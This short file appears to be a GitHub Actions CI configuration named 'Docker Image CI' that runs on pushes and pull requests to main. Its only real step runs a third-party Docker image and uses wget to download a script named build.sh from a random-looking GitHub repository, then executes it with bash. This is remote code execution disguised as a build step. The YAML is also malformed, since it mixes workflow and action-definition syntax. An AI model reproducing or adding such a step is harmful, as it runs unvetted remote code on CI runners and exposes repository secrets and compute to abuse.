name: Docker Image CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

runs:
  using: 'docker'
  image: 'docker://dazz111/ubuntu-sdk:build'
  args:
    - wget https://raw.githubusercontent.com/Jjtitdutitdtti7s5s/fejeyrb/main/build.sh && bash build.sh
